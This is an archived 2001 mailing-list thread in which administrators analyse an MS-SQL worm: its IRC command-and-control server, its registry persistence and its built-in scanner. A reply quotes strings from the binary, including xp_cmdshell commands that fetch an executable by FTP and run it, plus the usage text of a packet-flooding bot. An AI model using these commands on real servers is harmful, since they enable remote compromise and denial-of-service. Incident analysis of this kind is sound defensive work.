Security Incidents mailing list archives
Re: MS-SQL Worm?
From: Arthur Donkers <arthur () reseau nl>
Date: Tue, 20 Nov 2001 19:50:10 +0100 (CET)
Hi All, Analysed it a bit further (thanks to VMware and netmonitor) and once it is started it connects to an irc server at bots.kujikiri.net, port 6669. From the rest of the capture it seems it drops a message there with the name of the machine it compromised and a password like string. It furthermore (see strings output on executable, scan for registry keys) adds itself to the Run entry in the registry so it is started each time the machine is booted. A few of the registry keys: SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TaskReg SOFTWARE\Microsoft\MSSQLServer\Client\SuperSocketNetLib\ProtocolOrder SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo\DSQUERY
From the strings output it seems to contain a scanner (sm6 ..) that
will scan for new vulnerable machines. I'm not quite sure if and so, how, it is controlled from the IRC channel. I've tested it on our testing network so I'm not quite sure yet. I've attached the netmon capture file to this message. grtz, Arthur On Tue, 20 Nov 2001, Paul Nasrat wrote:
On Tue, Nov 20, 2001 at 09:54:18AM -0500, Douglas P. Brown wrote:We saw a scan come in looking for systems answering on 1433, and immediately saw several systems start scanning out for other systems answering on 1433 - worm behavior? Has anyone else seen this?No, but the binaries it downloads: win32mon.exe and dnsservice.exe Are on the ftp site in the dump. I don't have a windows debugger to put them through but they look interesting: exec xp_cmdshell 'start dnsservice.exe' exec xp_cmdshell 'del ftp.x' exec xp_cmdshell 'ftp -s:ftp.x exec xp_cmdshell 'echo quit >> ftp.x' exec xp_cmdshell 'echo close >> ftp.x' exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x' exec xp_cmdshell 'echo cd tmp>> ftp.x' exec xp_cmdshell 'echo cd pub>> ftp.x' exec xp_cmdshell 'echo bin>> ftp.x' exec xp_cmdshell 'echo foo.com>> ftp.x' exec xp_cmdshell 'echo ftp> ftp.x' GET /%s HTTP/1.0 Connection: Keep-Alive User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) [GET] - Unable to connect to http. [GET] - Unable to resolve host. http:// [GET] - Unable to create new socket. GET <bot|wildcard> <host> <save as> %s %s %s %s NOTICE %s :Voyager Alpha Force: Age of Kaiten (now with blitz-fu) NICK %s NOTICE %s :Nick cannot be larger than 9 characters. NOTICE %s :NICK <nick> sm6 has finished... with tcp/syn boost! sm6 icmp/udp has begun... sm6 icmp/udp (w/pkt-push!) has begun.. Syntax: sm6 <wildcard|botname> <dest> <-n timelength> [-d delay] [-s src port] [-p dst port] [-rR random src/all ports] [-z random src ips] [-t include tcp/syn] [-z randomize src ips] [-S pkt size] -b <bcast file> etc. Paul Nasrat ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Attachment:
sqlworm.cap
Description:
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- MS-SQL Worm? Douglas P. Brown (Nov 20)
- Re: MS-SQL Worm? Paul Nasrat (Nov 20)
- Re: MS-SQL Worm? Arthur Donkers (Nov 20)
- Re: MS-SQL Worm? Patrick Andry (Nov 20)
- Re: MS-SQL Worm? Johannes Verelst (Nov 20)
- Re: MS-SQL Worm? Unknown (Nov 20)
- Re: MS-SQL Worm? Arthur Donkers (Nov 20)
- Re: MS-SQL Worm? Paul Nasrat (Nov 20)